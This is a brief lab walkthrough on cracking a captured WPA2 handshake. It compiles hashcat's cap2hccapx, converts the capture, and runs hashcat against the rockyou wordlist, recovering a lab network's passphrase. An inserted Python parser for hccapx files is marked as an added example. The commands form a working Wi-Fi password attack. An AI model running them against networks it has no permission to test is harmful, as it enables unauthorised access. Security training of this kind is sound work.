Cracking WPA2 Handshake

This section covers how to crack a WPA2 handshake captured with the previously showcased attack vector.


Last updated 3 years ago


Cracking

We need to convert the captured .pcap file into .hccapx format before we can start cracking it. A tool named cap2hccapx can do this, but we first need to download and compile it on our Unix system.

Compiling cap2hccapx

  • Downloading Source

wget https://raw.githubusercontent.com/hashcat/hashcat-utils/master/src/cap2hccapx.c

  • Compiling Tool

gcc -o cap2hccapx cap2hccapx.c

  • Testing Tool

./cap2hccapx

Converting

Now that we have the tool compiled and ready to go, we can convert the file and prep it for cracking!

./cap2hccapx E4-6F-13-FA-AD-E0_partial.pcap capture.hccapx
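Before handing capture.hccapx to Hashcat, it is worth confirming that it really holds a handshake for the intended lab network. The following is an added example, not part of the original page or of hashcat-utils: it parses the packed 393-byte hccapx record layout published in hashcat's format description, and the sample record and the names `parse_hccapx` and `sample_record` are constructed for illustration.

```python
import struct
import sys

# hccapx record: little-endian, packed. Fields in order: signature, version,
# message_pair, essid_len, essid, keyver, keymic, mac_ap, nonce_ap, mac_sta,
# nonce_sta, eapol_len, eapol.
HCCAPX = struct.Struct("<4sIBB32sB16s6s32s6s32sH256s")
assert HCCAPX.size == 393


def parse_hccapx(data):
    """Return one dict per handshake record found in an .hccapx blob."""
    if not data or len(data) % HCCAPX.size:
        raise ValueError("size %d is not a multiple of %d" % (len(data), HCCAPX.size))
    records = []
    for off in range(0, len(data), HCCAPX.size):
        (sig, version, msg_pair, essid_len, essid, keyver, _keymic, mac_ap,
         _nonce_ap, mac_sta, _nonce_sta, eapol_len, _eapol) = HCCAPX.unpack_from(data, off)
        if sig != b"HCPX":
            raise ValueError("bad signature at offset %d" % off)
        if essid_len > 32 or eapol_len > 256:
            raise ValueError("length field out of range at offset %d" % off)
        records.append({
            "version": version,
            "essid": essid[:essid_len].decode("utf-8", "replace"),
            "mac_ap": mac_ap.hex(),
            "mac_sta": mac_sta.hex(),
            "keyver": keyver,            # 1 = WPA, 2 = WPA2
            "message_pair": msg_pair,    # which EAPOL messages were paired
            "eapol_len": eapol_len,
        })
    return records


def sample_record():
    # Constructed sample: ESSID and MACs mirror the lab network on this page;
    # nonces, MIC and EAPOL bytes are zero filler, not a real handshake.
    return HCCAPX.pack(b"HCPX", 4, 0, 6, b"Nee2.4", 2, bytes(16),
                       bytes.fromhex("e46f13faade0"), bytes(32),
                       bytes.fromhex("c6adf262679d"), bytes(32), 121, bytes(256))


if __name__ == "__main__":
    # Pass a real file (e.g. capture.hccapx) or fall back to the constructed sample.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else sample_record()
    for r in parse_hccapx(blob):
        print("{mac_ap}:{mac_sta}:{essid} keyver={keyver} pair={message_pair}".format(**r))
```

An empty or truncated file raises `ValueError`, which usually means the .pcap did not contain a usable handshake.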

Cracking with .hccapx

.\hashcat.exe -m 2500 .\hashes\capture.hccapx .\wordlists\rockyou.txt --force

e46f13faade0:c6adf262679d:Nee2.4:tinkerbell

tinkerbell is the PSK of the network in question.

We were successfully able to crack the handshake and retrieve the password to the lab network!

I'll be using Hashcat for the cracking on my host machine. Here's a post where I explain why cracking on the host machine is better 😊!